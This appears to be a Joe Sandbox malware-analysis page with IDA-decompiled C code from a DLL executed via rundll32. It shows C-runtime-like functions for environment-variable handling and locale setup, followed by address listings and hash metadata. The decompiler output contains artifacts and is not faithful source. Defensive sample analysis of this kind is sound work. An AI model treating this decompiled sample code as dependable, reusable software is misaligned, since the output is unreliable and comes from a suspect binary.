Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
String ID:
API String ID: 1186856153-0
Opcode ID: 9a4858990016edd865b9f5722faa12f8155521a7dd883606db600d808f10d677
Instruction ID: baac971f02029b1684e9aa9550a20a3cdcf8536d5ea312e8ad83acfebace1a35
Opcode Fuzzy Hash: 9a4858990016edd865b9f5722faa12f8155521a7dd883606db600d808f10d677
Instruction Fuzzy Hash: B7C1C175D04208AFEB04CFA4C895EEE7BF8FF09380F104159E50AA7285EF35AA85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10028E03, Relevance: 24.4, APIs: 16, Instructions: 411
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10028E03(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v0;
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v48;
				signed int _v100;
				signed int _v136;
				signed int _t116;
				signed int _t119;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t128;
				signed int _t129;
				signed int _t133;
				signed int _t135;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				void* _t147;
				signed int _t152;
				signed int* _t154;
				signed int* _t160;
				signed int _t166;
				signed int _t169;
				void* _t170;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t182;
				intOrPtr* _t191;
				signed int _t196;
				signed int _t203;
				intOrPtr* _t210;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t237;
				signed int _t238;
				void* _t239;
				void* _t241;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				signed int _t267;
				signed int _t270;
				signed int _t272;
				signed int _t274;
				signed int _t281;
				signed int _t282;
				void* _t283;
				signed int _t284;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				WCHAR* _t302;
				signed int _t303;
				signed int _t304;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t316;
				void* _t317;
				void* _t319;
				void* _t320;
				void* _t322;
				void* _t324;

				_t222 = __ebx;
				_t308 = _t316;
				_t317 = _t316 - 0x10;
				_t295 = _a4;
				_t326 = _t295;
				if(_t295 != 0) {
					_push(__ebx);
					_t286 = _t295;
					_t116 = E10041B10(_t295, 0x3d);
					_v20 = _t116;
					__eflags = _t116;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t116 - _t295;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t116 + 1));
							L120();
							_t222 = 0;
							__eflags =  *0x1004e384 - _t222; // 0x4fa288
							if(__eflags != 0) {
								L14:
								_t121 =  *0x1004e384; // 0x4fa288
								_v12 = _t121;
								__eflags = _t121;
								if(_t121 == 0) {
									goto L39;
								} else {
									_t124 = E10029436(_t295, _v20 - _t295);
									_v16 = _t124;
									_t237 = _v12;
									__eflags = _t124;
									if(_t124 < 0) {
										L24:
										__eflags = _v5 - _t222;
										if(_v5 == _t222) {
											goto L40;
										} else {
											_t125 =  ~_t124;
											_v16 = _t125;
											_t30 = _t125 + 2; // 0x2
											_t282 = _t30;
											__eflags = _t282 - _t125;
											if(_t282 < _t125) {
												goto L39;
											} else {
												__eflags = _t282 - 0x3fffffff;
												if(_t282 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E10029699(_t237, _t282, 4);
													E100268B3(_t222);
													_t128 = _v12;
													_t317 = _t317 + 0x10;
													__eflags = _t128;
													if(_t128 == 0) {
														goto L39;
													} else {
														_t238 = _v16;
														_t286 = _t222;
														 *(_t128 + _t238 * 4) = _t295;
														 *(_t128 + 4 + _t238 * 4) = _t222;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t237 - _t222;
										if( *_t237 == _t222) {
											goto L24;
										} else {
											E100268B3( *((intOrPtr*)(_t237 + _t124 * 4)));
											_t281 = _v16;
											__eflags = _v5 - _t222;
											if(_v5 != _t222) {
												_t286 = _t222;
												 *(_v12 + _t281 * 4) = _t295;
											} else {
												_t282 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t282 + _t281 * 4)) - _t222;
													if( *((intOrPtr*)(_t282 + _t281 * 4)) == _t222) {
														break;
													}
													 *((intOrPtr*)(_t282 + _t281 * 4)) =  *((intOrPtr*)(_t282 + 4 + _t281 * 4));
													_t281 = _t281 + 1;
													__eflags = _t281;
												}
												_v16 = E10029699(_t282, _t281, 4);
												E100268B3(_t222);
												_t128 = _v16;
												_t317 = _t317 + 0x10;
												__eflags = _t128;
												if(_t128 != 0) {
													L29:
													 *0x1004e384 = _t128;
												}
											}
											__eflags = _a8 - _t222;
											if(_a8 == _t222) {
												goto L40;
											} else {
												_t239 = _t295 + 1;
												do {
													_t129 =  *_t295;
													_t295 = _t295 + 1;
													__eflags = _t129;
												} while (_t129 != 0);
												_v16 = _t295 - _t239 + 2;
												_t298 = E10026850(_t295 - _t239 + 2, 1);
												_pop(_t241);
												__eflags = _t298;
												if(_t298 == 0) {
													L37:
													E100268B3(_t298);
													goto L40;
												} else {
													_t133 = E100120A5(_t298, _v16, _a4);
													_t319 = _t317 + 0xc;
													__eflags = _t133;
													if(__eflags != 0) {
														_push(_t222);
														_push(_t222);
														_push(_t222);
														_push(_t222);
														_push(_t222);
														E1000E341();
														asm("int3");
														_push(_t308);
														_t310 = _t319;
														_t320 = _t319 - 0x10;
														_push(_t222);
														_t225 = _v48;
														__eflags = _t225;
														if(__eflags != 0) {
															_push(_t298);
															_push(_t286);
															_push(0x3d);
															_push(_t225);
															_t288 = _t225;
															_t135 = E10041C3B(_t241);
															_v20 = _t135;
															__eflags = _t135;
															if(__eflags == 0) {
																L81:
																 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
																goto L82;
															} else {
																__eflags = _t135 - _t225;
																if(__eflags == 0) {
																	goto L81;
																} else {
																	_t139 =  *(_t135 + 2) & 0x0000ffff;
																	_v24 = _t139;
																	_v16 = _t139;
																	E1002941C();
																	_t300 =  *0x1004e388; // 0x0
																	_t226 = 0;
																	__eflags = _t300;
																	if(_t300 != 0) {
																		L59:
																		_v20 = _v20 - _t288 >> 1;
																		_t142 = E1002948B(_t288, _v20 - _t288 >> 1);
																		_v12 = _t142;
																		__eflags = _t142;
																		if(_t142 < 0) {
																			L67:
																			__eflags = _v16 - _t226;
																			if(_v16 == _t226) {
																				goto L83;
																			} else {
																				_t143 =  ~_t142;
																				_v12 = _t143;
																				_t75 = _t143 + 2; // 0x2
																				_t252 = _t75;
																				__eflags = _t252 - _t143;
																				if(_t252 < _t143) {
																					goto L82;
																				} else {
																					__eflags = _t252 - 0x3fffffff;
																					if(_t252 >= 0x3fffffff) {
																						goto L82;
																					} else {
																						_t301 = E10029699(_t300, _t252, 4);
																						E100268B3(_t226);
																						_t320 = _t320 + 0x10;
																						__eflags = _t301;
																						if(_t301 == 0) {
																							goto L82;
																						} else {
																							_t253 = _v12;
																							_t288 = _t226;
																							_t146 = _v0;
																							 *(_t301 + _t253 * 4) = _t146;
																							 *(_t301 + 4 + _t253 * 4) = _t226;
																							goto L72;
																						}
																					}
																				}
																			}
																		} else {
																			__eflags =  *_t300 - _t226;
																			if( *_t300 == _t226) {
																				goto L67;
																			} else {
																				E100268B3( *((intOrPtr*)(_t300 + _t142 * 4)));
																				_t274 = _v12;
																				__eflags = _v16 - _t226;
																				if(_v16 == _t226) {
																					while(1) {
																						__eflags =  *(_t300 + _t274 * 4) - _t226;
																						if( *(_t300 + _t274 * 4) == _t226) {
																							break;
																						}
																						 *(_t300 + _t274 * 4) =  *(_t300 + 4 + _t274 * 4);
																						_t274 = _t274 + 1;
																						__eflags = _t274;
																					}
																					_t301 = E10029699(_t300, _t274, 4);
																					E100268B3(_t226);
																					_t320 = _t320 + 0x10;
																					_t146 = _t288;
																					__eflags = _t301;
																					if(_t301 != 0) {
																						L72:
																						 *0x1004e388 = _t301;
																					}
																				} else {
																					_t146 = _v0;
																					_t288 = _t226;
																					 *(_t300 + _t274 * 4) = _t146;
																				}
																				__eflags = _a4 - _t226;
																				if(_a4 == _t226) {
																					goto L83;
																				} else {
																					_t254 = _t146;
																					_t84 = _t254 + 2; // 0x2
																					_t283 = _t84;
																					do {
																						_t147 =  *_t254;
																						_t254 = _t254 + 2;
																						__eflags = _t147 - _t226;
																					} while (_t147 != _t226);
																					_t85 = (_t254 - _t283 >> 1) + 2; // 0x0
																					_v16 = _t85;
																					_t302 = E10026850(_t85, 2);
																					_pop(_t258);
																					__eflags = _t302;
																					if(_t302 == 0) {
																						L80:
																						E100268B3(_t302);
																						goto L83;
																					} else {
																						_t152 = E10028A30(_t302, _v16, _v0);
																						_t322 = _t320 + 0xc;
																						__eflags = _t152;
																						if(_t152 != 0) {
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							E1000E341();
																							asm("int3");
																							_push(_t310);
																							_t312 = _t322;
																							_push(_t288);
																							_t290 = _v100;
																							__eflags = _t290;
																							if(_t290 != 0) {
																								_t260 = 0;
																								_t154 = _t290;
																								__eflags =  *_t290;
																								if( *_t290 != 0) {
																									do {
																										_t154 =  &(_t154[1]);
																										_t260 = _t260 + 1;
																										__eflags =  *_t154;
																									} while ( *_t154 != 0);
																								}
																								_t96 = _t260 + 1; // 0x2
																								_t303 = E10026850(_t96, 4);
																								_t262 = _t302;
																								__eflags = _t303;
																								if(_t303 == 0) {
																									L101:
																									E10012120(_t226, _t262, _t283, _t303);
																									goto L102;
																								} else {
																									_t270 =  *_t290;
																									__eflags = _t270;
																									if(_t270 == 0) {
																										L100:
																										E100268B3(0);
																										_t177 = _t303;
																										goto L88;
																									} else {
																										_push(_t226);
																										_t226 = _t303 - _t290;
																										__eflags = _t226;
																										do {
																											_t97 = _t270 + 1; // 0x5
																											_t283 = _t97;
																											do {
																												_t178 =  *_t270;
																												_t270 = _t270 + 1;
																												__eflags = _t178;
																											} while (_t178 != 0);
																											_t262 = _t270 - _t283;
																											_t98 = _t262 + 1; // 0x6
																											_v16 = _t98;
																											 *(_t226 + _t290) = E10026850(_t98, 1);
																											E100268B3(0);
																											_t322 = _t322 + 0xc;
																											__eflags =  *(_t226 + _t290);
																											if( *(_t226 + _t290) == 0) {
																												goto L101;
																											} else {
																												_t182 = E100120A5( *(_t226 + _t290), _v16,  *_t290);
																												_t322 = _t322 + 0xc;
																												__eflags = _t182;
																												if(_t182 != 0) {
																													L102:
																													_push(0);
																													_push(0);
																													_push(0);
																													_push(0);
																													_push(0);
																													E1000E341();
																													asm("int3");
																													_push(_t312);
																													_push(_t262);
																													_push(_t262);
																													_push(_t290);
																													_t291 = _v136;
																													__eflags = _t291;
																													if(_t291 != 0) {
																														_t284 = 0;
																														_t160 = _t291;
																														_t263 = 0;
																														_v20 = 0;
																														__eflags =  *_t291;
																														if( *_t291 != 0) {
																															do {
																																_t160 =  &(_t160[1]);
																																_t263 = _t263 + 1;
																																__eflags =  *_t160;
																															} while ( *_t160 != 0);
																														}
																														_t107 = _t263 + 1; // 0x2
																														_t304 = E10026850(_t107, 4);
																														_t265 = _t303;
																														__eflags = _t304;
																														if(_t304 == 0) {
																															L118:
																															E10012120(_t226, _t265, _t284, _t304);
																															goto L119;
																														} else {
																															_t267 =  *_t291;
																															__eflags = _t267;
																															if(_t267 == 0) {
																																L117:
																																E100268B3(0);
																																_t169 = _t304;
																																goto L105;
																															} else {
																																_push(_t226);
																																_t226 = _t304 - _t291;
																																__eflags = _t226;
																																do {
																																	_t108 = _t267 + 2; // 0x6
																																	_t284 = _t108;
																																	do {
																																		_t170 =  *_t267;
																																		_t267 = _t267 + 2;
																																		__eflags = _t170 - _v20;
																																	} while (_t170 != _v20);
																																	_t110 = (_t267 - _t284 >> 1) + 1; // 0x3
																																	_v24 = _t110;
																																	 *(_t226 + _t291) = E10026850(_t110, 2);
																																	E100268B3(0);
																																	_t324 = _t322 + 0xc;
																																	__eflags =  *(_t226 + _t291);
																																	if( *(_t226 + _t291) == 0) {
																																		goto L118;
																																	} else {
																																		_t175 = E10028A30( *(_t226 + _t291), _v24,  *_t291);
																																		_t322 = _t324 + 0xc;
																																		__eflags = _t175;
																																		if(_t175 != 0) {
																																			L119:
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			E1000E341();
																																			asm("int3");
																																			_t166 =  *0x1004e384; // 0x4fa288
																																			__eflags = _t166 -  *0x1004e390; // 0x4fa288
																																			if(__eflags == 0) {
																																				_push(_t166);
																																				L86();
																																				 *0x1004e384 = _t166;
																																				return _t166;
																																			}
																																			return _t166;
																																		} else {
																																			goto L115;
																																		}
																																	}
																																	goto L123;
																																	L115:
																																	_t291 = _t291 + 4;
																																	_t267 =  *_t291;
																																	__eflags = _t267;
																																} while (_t267 != 0);
																																goto L117;
																															}
																														}
																													} else {
																														_t169 = 0;
																														__eflags = 0;
																														L105:
																														return _t169;
																													}
																												} else {
																													goto L98;
																												}
																											}
																											goto L123;
																											L98:
																											_t290 = _t290 + 4;
																											_t270 =  *_t290;
																											__eflags = _t270;
																										} while (_t270 != 0);
																										goto L100;
																									}
																								}
																							} else {
																								_t177 = 0;
																								__eflags = 0;
																								L88:
																								return _t177;
																							}
																						} else {
																							_t272 =  &(_t302[_v20 + 1]);
																							 *((short*)(_t272 - 2)) = 0;
																							asm("sbb eax, eax");
																							__eflags = SetEnvironmentVariableW(_t302,  ~(_v24 & 0x0000ffff) & _t272);
																							if(__eflags == 0) {
																								_t191 = E1002449E(__eflags);
																								_t226 = _t226 | 0xffffffff;
																								__eflags = _t226;
																								 *_t191 = 0x2a;
																							}
																							goto L80;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t196 =  *0x1004e384; // 0x4fa288
																		__eflags = _a4;
																		if(_a4 == 0) {
																			L52:
																			__eflags = _v16 - _t226;
																			if(_v16 != _t226) {
																				__eflags = _t196;
																				if(_t196 != 0) {
																					L57:
																					 *0x1004e388 = E10026850(1, 4);
																					E100268B3(_t226);
																					_t320 = _t320 + 0xc;
																					goto L58;
																				} else {
																					 *0x1004e384 = E10026850(1, 4);
																					E100268B3(_t226);
																					_t320 = _t320 + 0xc;
																					__eflags =  *0x1004e384 - _t226; // 0x4fa288
																					if(__eflags == 0) {
																						goto L82;
																					} else {
																						_t300 =  *0x1004e388; // 0x0
																						__eflags = _t300;
																						if(_t300 != 0) {
																							goto L59;
																						} else {
																							goto L57;
																						}
																					}
																				}
																			} else {
																				_t226 = 0;
																				goto L83;
																			}
																		} else {
																			__eflags = _t196;
																			if(_t196 == 0) {
																				goto L52;
																			} else {
																				__eflags = L10011782();
																				if(__eflags == 0) {
																					goto L81;
																				} else {
																					E1002941C();
																					L58:
																					_t300 =  *0x1004e388; // 0x0
																					__eflags = _t300;
																					if(_t300 == 0) {
																						L82:
																						_t226 = _t225 | 0xffffffff;
																						__eflags = _t226;
																						L83:
																						E100268B3(_t288);
																						_t138 = _t226;
																						goto L84;
																					} else {
																						goto L59;
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															_t203 = E1002449E(__eflags);
															 *_t203 = 0x16;
															_t138 = _t203 | 0xffffffff;
															L84:
															return _t138;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t298 - _a4 - 1) = _t222;
														__eflags = E10031BEE(_v20 + 1 + _t298 - _a4, _t282, __eflags, _t298,  ~_v5 & _v20 + 0x00000001 + _t298 - _a4);
														if(__eflags == 0) {
															_t210 = E1002449E(__eflags);
															_t223 = _t222 | 0xffffffff;
															__eflags = _t223;
															 *_t210 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t222;
									if(_v5 != _t222) {
										 *0x1004e384 = E10026850(1, 4);
										E100268B3(_t222);
										_t317 = _t317 + 0xc;
										__eflags =  *0x1004e384 - _t222; // 0x4fa288
										if(__eflags == 0) {
											L39:
											_t223 = _t222 | 0xffffffff;
											__eflags = _t223;
											goto L40;
										} else {
											__eflags =  *0x1004e388 - _t222; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x1004e388 = E10026850(1, 4);
												E100268B3(_t222);
												_t317 = _t317 + 0xc;
												__eflags =  *0x1004e388 - _t222; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t223 = 0;
										L40:
										E100268B3(_t286);
										_t119 = _t223;
										goto L41;
									}
								} else {
									__eflags =  *0x1004e388 - _t222; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L1001177D();
										if(__eflags == 0) {
											goto L38;
										} else {
											L120();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t221 = E1002449E(_t326);
					 *_t221 = 0x16;
					_t119 = _t221 | 0xffffffff;
					L41:
					return _t119;
				}
				L123:
			}

0x10028e03
0x10028e06
0x10028e08
0x10028e0c
0x10028e0f
0x10028e11
0x10028e26
0x10028e2b
0x10028e2d
0x10028e32
0x10028e37
0x10028e39
0x1002901a
0x1002901f
0x00000000
0x10028e3f
0x10028e3f
0x10028e41
0x00000000
0x10028e47
0x10028e4a
0x10028e4d
0x10028e52
0x10028e54
0x10028e5a
0x10028ed7
0x10028ed7
0x10028edc
0x10028edf
0x10028ee1
0x00000000
0x10028ee7
0x10028eee
0x10028ef3
0x10028ef8
0x10028efb
0x10028efd
0x10028f4e
0x10028f4e
0x10028f51
0x00000000
0x10028f57
0x10028f57
0x10028f59
0x10028f5c
0x10028f5c
0x10028f5f
0x10028f61
0x00000000
0x10028f67
0x10028f67
0x10028f6d
0x00000000
0x10028f73
0x10028f7d
0x10028f80
0x10028f85
0x10028f88
0x10028f8b
0x10028f8d
0x00000000
0x10028f93
0x10028f93
0x10028f96
0x10028f98
0x10028f9b
0x00000000
0x10028f9b
0x10028f8d
0x10028f6d
0x10028f61
0x10028eff
0x10028eff
0x10028f01
0x00000000
0x10028f03
0x10028f06
0x10028f0c
0x10028f0f
0x10028f12
0x10028f47
0x10028f49
0x10028f14
0x10028f14
0x10028f21
0x10028f21
0x10028f24
0x00000000
0x00000000
0x10028f1d
0x10028f20
0x10028f20
0x10028f20
0x10028f30
0x10028f33
0x10028f38
0x10028f3b
0x10028f3e
0x10028f40
0x10028f9f
0x10028f9f
0x10028f9f
0x10028f40
0x10028fa4
0x10028fa7
0x00000000
0x10028fa9
0x10028fa9
0x10028fac
0x10028fac
0x10028fae
0x10028faf
0x10028faf
0x10028fbb
0x10028fc3
0x10028fc6
0x10028fc7
0x10028fc9
0x10029011
0x10029012
0x00000000
0x10028fcb
0x10028fd2
0x10028fd7
0x10028fda
0x10028fdc
0x10029036
0x10029037
0x10029038
0x10029039
0x1002903a
0x1002903b
0x10029040
0x10029043
0x10029044
0x10029046
0x10029049
0x1002904a
0x1002904d
0x1002904f
0x10029064
0x10029065
0x10029066
0x10029068
0x10029069
0x1002906b
0x10029070
0x10029075
0x10029077
0x1002926d
0x10029272
0x00000000
0x1002907d
0x1002907d
0x1002907f
0x00000000
0x10029085
0x10029089
0x1002908b
0x1002908e
0x10029091
0x10029096
0x1002909c
0x1002909e
0x100290a0
0x1002912b
0x10029136
0x10029139
0x1002913e
0x10029143
0x10029145
0x10029193
0x10029193
0x10029197
0x00000000
0x1002919d
0x1002919d
0x1002919f
0x100291a2
0x100291a2
0x100291a5
0x100291a7
0x00000000
0x100291ad
0x100291ad
0x100291b3
0x00000000
0x100291b9
0x100291c3
0x100291c5
0x100291ca
0x100291cd
0x100291cf
0x00000000
0x100291d5
0x100291d5
0x100291d8
0x100291da
0x100291dd
0x100291e0
0x00000000
0x100291e0
0x100291cf
0x100291b3
0x100291a7
0x10029147
0x10029147
0x10029149
0x00000000
0x1002914b
0x1002914e
0x10029154
0x10029157
0x1002915b
0x10029172
0x10029172
0x10029175
0x00000000
0x00000000
0x1002916e
0x10029171
0x10029171
0x10029171
0x10029181
0x10029183
0x10029188
0x1002918b
0x1002918d
0x1002918f
0x100291e4
0x100291e4
0x100291e4
0x1002915d
0x1002915d
0x10029160
0x10029162
0x10029162
0x100291ea
0x100291ed
0x00000000
0x100291f3
0x100291f3
0x100291f5
0x100291f5
0x100291f8
0x100291f8
0x100291fb
0x100291fe
0x100291fe
0x10029209
0x1002920d
0x10029215
0x10029218
0x10029219
0x1002921b
0x10029264
0x10029265
0x00000000
0x1002921d
0x10029225
0x1002922a
0x1002922d
0x1002922f
0x10029289
0x1002928a
0x1002928b
0x1002928c
0x1002928d
0x1002928e
0x10029293
0x10029296
0x10029297
0x1002929a
0x1002929b
0x1002929e
0x100292a0
0x100292a7
0x100292a9
0x100292ab
0x100292ad
0x100292af
0x100292af
0x100292b2
0x100292b3
0x100292b3
0x100292af
0x100292b9
0x100292c4
0x100292c7
0x100292c8
0x100292ca
0x10029332
0x10029332
0x00000000
0x100292cc
0x100292cc
0x100292ce
0x100292d0
0x10029322
0x10029324
0x1002932a
0x00000000
0x100292d2
0x100292d2
0x100292d5
0x100292d5
0x100292d7
0x100292d7
0x100292d7
0x100292da
0x100292da
0x100292dc
0x100292dd
0x100292dd
0x100292e1
0x100292e5
0x100292e9
0x100292f3
0x100292f6
0x100292fb
0x100292fe
0x10029302
0x00000000
0x10029304
0x1002930c
0x10029311
0x10029314
0x10029316
0x10029337
0x10029339
0x1002933a
0x1002933b
0x1002933c
0x1002933d
0x1002933e
0x10029343
0x10029346
0x10029349
0x1002934a
0x1002934b
0x1002934c
0x1002934f
0x10029351
0x10029358
0x1002935a
0x1002935c
0x1002935e
0x10029361
0x10029363
0x10029365
0x10029365
0x10029368
0x10029369
0x10029369
0x10029365
0x1002936e
0x10029379
0x1002937c
0x1002937d
0x1002937f
0x100293f0
0x100293f0
0x00000000
0x10029381
0x10029381
0x10029383
0x10029385
0x100293df
0x100293e2
0x100293e8
0x00000000
0x10029387
0x10029387
0x1002938a
0x1002938a
0x1002938c
0x1002938c
0x1002938c
0x1002938f
0x1002938f
0x10029392
0x10029395
0x10029395
0x100293a1
0x100293a5
0x100293ad
0x100293b3
0x100293b8
0x100293bb
0x100293bf
0x00000000
0x100293c1
0x100293c9
0x100293ce
0x100293d1
0x100293d3
0x100293f5
0x100293f7
0x100293f8
0x100293f9
0x100293fa
0x100293fb
0x100293fc
0x10029401
0x10029402
0x10029407
0x1002940d
0x1002940f
0x10029410
0x10029416
0x00000000
0x10029416
0x1002941b
0x00000000
0x00000000
0x00000000
0x100293d3
0x00000000
0x100293d5
0x100293d5
0x100293d8
0x100293da
0x100293da
0x00000000
0x100293de
0x10029385
0x10029353
0x10029353
0x10029353
0x10029355
0x10029357
0x10029357
0x00000000
0x00000000
0x00000000
0x10029316
0x00000000
0x10029318
0x10029318
0x1002931b
0x1002931d
0x1002931d
0x00000000
0x10029321
0x100292d0
0x100292a2
0x100292a2
0x100292a2
0x100292a4
0x100292a6
0x100292a6
0x10029231
0x10029235
0x1002923a
0x10029246
0x10029252
0x10029254
0x10029256
0x1002925b
0x1002925b
0x1002925e
0x1002925e
0x00000000
0x10029254
0x1002922f
0x1002921b
0x100291ed
0x10029149
0x100290a6
0x100290a6
0x100290ab
0x100290ae
0x100290c8
0x100290c8
0x100290cc
0x100290d5
0x100290d7
0x10029106
0x10029110
0x10029115
0x1002911a
0x00000000
0x100290d9
0x100290e3
0x100290e8
0x100290ed
0x100290f0
0x100290f6
0x00000000
0x100290fc
0x100290fc
0x10029102
0x10029104
0x00000000
0x00000000
0x00000000
0x00000000
0x10029104
0x100290f6
0x100290ce
0x100290ce
0x00000000
0x100290ce
0x100290b0
0x100290b0
0x100290b2
0x00000000
0x100290b4
0x100290b9
0x100290bb
0x00000000
0x100290c1
0x100290c1
0x1002911d
0x1002911d
0x10029123
0x10029125
0x10029278
0x10029278
0x10029278
0x1002927b
0x1002927c
0x10029283
0x00000000
0x00000000
0x00000000
0x00000000
0x10029125
0x100290bb
0x100290b2
0x100290ae
0x100290a0
0x1002907f
0x10029051
0x10029051
0x10029056
0x1002905c
0x10029286
0x10029288
0x10029288
0x10028fde
0x10028fef
0x10028ff3
0x10028fff
0x10029001
0x10029003
0x10029008
0x10029008
0x1002900b
0x1002900b
0x00000000
0x10029001
0x10028fdc
0x10028fc9
0x10028fa7
0x10028f01
0x10028efd
0x10028e5c
0x10028e5c
0x10028e5f
0x10028e7d
0x10028e7d
0x10028e80
0x10028e93
0x10028e98
0x10028e9d
0x10028ea0
0x10028ea6
0x10029025
0x10029025
0x10029025
0x00000000
0x10028eac
0x10028eac
0x10028eb2
0x00000000
0x10028eb4
0x10028ebe
0x10028ec3
0x10028ec8
0x10028ecb
0x10028ed1
0x00000000
0x00000000
0x00000000
0x00000000
0x10028ed1
0x10028eb2
0x10028e82
0x10028e82
0x10029028
0x10029029
0x10029030
0x00000000
0x10029032
0x10028e61
0x10028e61
0x10028e67
0x00000000
0x10028e69
0x10028e6e
0x10028e70
0x00000000
0x10028e76
0x10028e76
0x00000000
0x10028e76
0x10028e70
0x10028e67
0x10028e5f
0x10028e5a
0x10028e41
0x10028e13
0x10028e13
0x10028e18
0x10028e1e
0x10029033
0x10029035
0x10029035
0x00000000

APIs

_free.LIBCMT ref: 10028F06
_free.LIBCMT ref: 10028F33

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 97635c0a49cb45435f50765eec424ad806435337378acb293feb1f8b4acd9554
Instruction ID: c9aa2e72dc3717b8aeb007e04fd68db8c0b5e47be17badfa8eb106a72592e22b
Opcode Fuzzy Hash: 97635c0a49cb45435f50765eec424ad806435337378acb293feb1f8b4acd9554
Instruction Fuzzy Hash: 91D15775D04355AFEB10EFB4AD85AAE77E4EF053D0F92426EF904D7281EB31AA008B54

Uniqueness

Uniqueness Score: -1.00%

Function 1002E7A1, Relevance: 22.9, APIs: 15, Instructions: 357
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1002E7A1(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				intOrPtr* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char* _v80;
				char* _v84;
				void* _v88;
				char _v92;
				void* __edi;
				void* __ebp;
				signed int _t126;
				char _t129;
				char _t147;
				signed short _t150;
				signed int _t151;
				void* _t153;
				void* _t156;
				void* _t159;
				void* _t160;
				void* _t164;
				signed int _t165;
				intOrPtr* _t166;
				signed char _t183;
				signed int* _t186;
				void* _t190;
				char _t195;
				signed char _t197;
				void* _t204;
				char _t205;
				void* _t207;
				signed int* _t209;
				void* _t212;
				intOrPtr _t217;
				short* _t221;
				intOrPtr _t222;
				signed int _t223;
				signed int _t230;
				char* _t231;
				intOrPtr _t232;
				signed char _t235;
				signed char* _t236;
				void* _t237;
				char* _t239;
				char* _t240;
				signed char* _t251;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr* _t258;
				signed int _t259;
				short* _t260;
				signed int _t263;
				signed int _t264;
				void* _t265;
				void* _t266;

				_t233 = __edx;
				_t126 =  *0x1004d054; // 0xd94e5c04
				_v8 = _t126 ^ _t264;
				_t254 = _a4;
				_t205 = 0;
				_v56 = _t254;
				_t237 = 0;
				_v32 = 0;
				_t213 =  *((intOrPtr*)(_t254 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t254;
				_v88 = 0;
				if( *((intOrPtr*)(_t254 + 0xa8)) == 0) {
					__eflags =  *((intOrPtr*)(_t254 + 0x8c));
					if( *((intOrPtr*)(_t254 + 0x8c)) != 0) {
						asm("lock dec dword [eax]");
					}
					 *((intOrPtr*)(_t254 + 0x8c)) = _t205;
					_t129 = 0;
					__eflags = 0;
					 *((intOrPtr*)(_t254 + 0x90)) = _t205;
					 *_t254 = 0x10044480;
					 *((intOrPtr*)(_t254 + 0x94)) = 0x10044700;
					 *((intOrPtr*)(_t254 + 0x98)) = 0x10044880;
					 *((intOrPtr*)(_t254 + 4)) = 1;
					L48:
					return E100037EA(_t129, _v8 ^ _t264, _t233);
				}
				_t131 = _t254 + 8;
				_v52 = 0;
				if( *(_t254 + 8) != 0) {
					L3:
					_v52 = E10026850(1, 4);
					E100268B3(_t205);
					_v32 = E10026850(0x180, 2);
					E100268B3(_t205);
					_t237 = E10026850(0x180, 1);
					_v44 = _t237;
					E100268B3(_t205);
					_v36 = E10026850(0x180, 1);
					E100268B3(_t205);
					_v40 = E10026850(0x101, 1);
					E100268B3(_t205);
					_t266 = _t265 + 0x3c;
					if(_v52 == _t205 || _v32 == _t205) {
						L43:
